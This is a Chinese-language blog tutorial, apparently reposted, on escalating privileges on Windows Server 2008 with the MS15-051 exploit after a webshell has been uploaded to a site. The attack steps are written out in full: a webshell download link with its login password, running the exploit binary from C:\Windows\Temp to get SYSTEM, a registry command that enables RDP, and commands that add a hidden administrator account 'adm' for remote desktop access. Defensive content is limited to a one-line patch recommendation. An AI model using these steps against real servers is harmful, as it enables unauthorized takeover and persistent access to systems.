欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

程序员文章站 2022-07-15 13:19:14
...

目录

漏洞影响的操作系统

操作步骤:

msf进行攻击方法:

加固方式:


MS15-051简介

Windows 内核模式驱动程序中的漏洞可能允许特权提升 (3057191) , 如果攻击者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。
攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
攻击者必须拥有有效的登录凭据并能本地登录才能利用此漏洞。 远程或匿名用户无法利用此漏洞。

声明:以下的提权的介绍只适用于学习和授权情况下的操作,请勿用于非法环境!

漏洞影响的操作系统

Windows Server 2003

Windows Vista

Windows Server 2008

Windows Server 2008 R2 

环境准备:

攻击(攻击者)主机:      

windows2010         物理机      

                   

                       

目标(受害者)主机:        

winddows2008      虚拟机          

Nat    

     

192.168.254.133                        

                                  

 

很多时候,当我们上传了一句话木马之后,想要进行一些操作。比如,查看当前用户的身份,这时会发现权限不够,当前的命令行只对网站当前目录下的文件具有操作权限,对其他目录和系统都没有权限,这时我们就需要提权了。

我们把下面两个程序上传到网站目录下去
 

大马下载:

   链接:https://pan.baidu.com/s/1fq6B6W7GBR-D4qjerB6qwg
   提取码:68ks
   登陆大马密码:xiaowang520

工具下载传送门


操作步骤:

【步骤一】上传(这里是直接复制进行的,构建环境)大马到目标网页主目录,并在物理机上进行登陆,结果如【图1】所示:

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

图1

【步骤二】查看系统版本及补丁情况,结果如【图1】所示:

【命令】

systemifo  //查看系统版本及补丁情况

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

图2

【分析】目标服务器系统未进行补丁

【步骤三】查看用户权限,结果如【图3】所示:

【命令】

whoami  //查看用户权限

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

图3

【分析】】未取得系统system权限,需进行提权

【步骤三】上传ms15-051x64.exe至一个可执行的目录【C:\Windows\Temp】,进行提权,结果如【图3】所示:

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

图3

【步骤四】查看权限,,结果如【图4】所示:

【命令】

C:\Windows\Temp\ms15-051x64.exe "whoami"  //查看权限

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

图4

【分析】system用户说明提权成功
【步骤五】查看是否开启3389端口,并开启3389端口,结果如【图5】所示:

【命令】

C:\Windows\Temp\ms15-051x64.exe "netstat -ano"  //查看是否开启3389端口

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

开启3389端口,复制下面代码,创建一个*.bat的文件,上传到【C:\Windows\Temp】目录下:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

 C:\Windows\Temp\ms15-051x64.exe "C:\Windows\Temp\1.bat"

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

C:\Windows\Temp\ms15-051x64.exe "netstat -ano"

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

图5

【分析】开启3389端口成功

【步骤六】:创建一个可以加入管理员组的用户,进行远程桌面登陆,【创建系统用户的时候,密码一定要大小写混合,才符合windows2008创建用户的条件,不然创建用户会失败】结果如【图6】所示:

【命令】

C:\Windows\Temp\ms15-051x64.exe "net user adm Xye123456 /add"
C:\Windows\Temp\ms15-051x64.exe "net localgroup administrators adm /add"
C:\Windows\Temp\ms15-051x64.exe "net localgroup administrators "

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

图6

【步骤八】:进行远程桌面登陆,结果如【图7】所示:

【命令】

mstsc

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

图7

msf进行攻击方法:

资料:传送门

加固方式:

寻找漏洞相应的补丁,打补丁